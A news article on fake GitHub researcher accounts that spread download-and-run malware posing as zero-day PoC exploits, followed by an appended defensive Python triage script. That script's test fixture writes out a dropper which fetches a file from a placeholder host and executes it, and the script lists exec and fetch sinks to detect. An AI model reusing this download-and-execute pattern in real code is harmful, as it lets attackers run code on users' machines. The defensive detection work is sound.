
Fraudulent GitHub intrusion: fake accounts spread malware

A network of fake researchers is using GitHub to spread malicious code masquerading as proofs of concept for unknown vulnerabilities


Several fake GitHub accounts linked to a fraudulent cybersecurity firm have been spotted spreading malicious repositories on the code hosting service. Seven of these repositories, still accessible at the time of writing, pose as proof-of-concept (PoC) exploits for alleged zero-day vulnerabilities in Discord, Google Chrome, and Microsoft Exchange.

A network of lies

VulnCheck, which discovered the activity, said the authors of these repositories put considerable effort into making them plausible: they set up a series of Twitter accounts and profiles posing as members of a non-existent company called High Sierra Cyber Security. VulnCheck first encountered these repositories last May, when they were being used to spread similar PoC exploits for zero-day vulnerabilities in Signal and WhatsApp; both of those repositories have since been removed.

Masking the culprits

Not only did the authors share some of their alleged findings on Twitter to boost their legitimacy, they even used photos of real security researchers from companies such as Rapid7, showing the effort invested in building the campaign. The PoC is a Python script designed to download a malicious binary and run it on the victim's operating system, whether Windows or Linux. "The attacker put a lot of effort into creating all these fake identities, just to distribute easily recognizable malware," said VulnCheck researcher Jacob Baines. "It is unclear whether they have been successful, but the fact that they continue to pursue this attack strategy suggests that they believe they may be."

Final considerations on information security

It is currently unknown whether the perpetrator of these activities is a novice actor or an advanced persistent threat (APT). Security researchers have, however, been targeted by North Korean groups before, as Google revealed in January 2021. These events underscore the importance of exercising caution when downloading code from open source repositories: users should carefully examine code before executing it to make sure it does not pose a security risk.
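A defensive example, added here and not taken from the article or from VulnCheck: a static triage pass in Python that flags the download-and-run shape described above before a cloned PoC is executed. The sink names, the constructed sample script and its placeholder host are assumptions, not values from the campaign.

```python
"""Static triage of a cloned PoC script before anyone executes it."""
import ast

# module.attr names only; `from subprocess import call` aliases are not resolved.
EXEC_SINKS = {"os.system", "os.popen", "os.execv", "os.startfile", "exec", "eval",
              "subprocess.run", "subprocess.call", "subprocess.Popen"}
FETCH_SINKS = {"urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get"}

def _dotted(node):
    """Render a Name/Attribute chain as 'a.b.c'; None for other expressions."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def triage_poc_source(src):
    """Return the behaviours found plus a download-and-execute verdict."""
    found = {"fetch": set(), "exec": set(), "urls": set(), "platform_probe": False}
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in FETCH_SINKS:
                found["fetch"].add(name)
            elif name in EXEC_SINKS:
                found["exec"].add(name)
            elif name == "platform.system":  # OS branch, as in the reported PoC
                found["platform_probe"] = True
        elif (isinstance(node, ast.Constant) and isinstance(node.value, str)
              and node.value.startswith(("http://", "https://"))):
            found["urls"].add(node.value)  # hard-coded download locations
    # Fetching from the network and then executing is the pattern to stop on.
    found["download_and_execute"] = bool(found["fetch"] and found["exec"])
    return found

# Constructed fixture mimicking the reported dropper shape; the host is a placeholder.
SAMPLE_POC = '''
import platform, subprocess, urllib.request
url = "http://example.invalid/poc-helper"
dest = "helper.exe" if platform.system() == "Windows" else "helper"
urllib.request.urlretrieve(url, dest)
subprocess.call([dest])
'''

if __name__ == "__main__":
    print(triage_poc_source(SAMPLE_POC))
```

A hit on `download_and_execute` is a reason to read the script in full and run it only in an isolated environment, not a verdict on its own.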


06/14/2023 11:02

Marco Verro
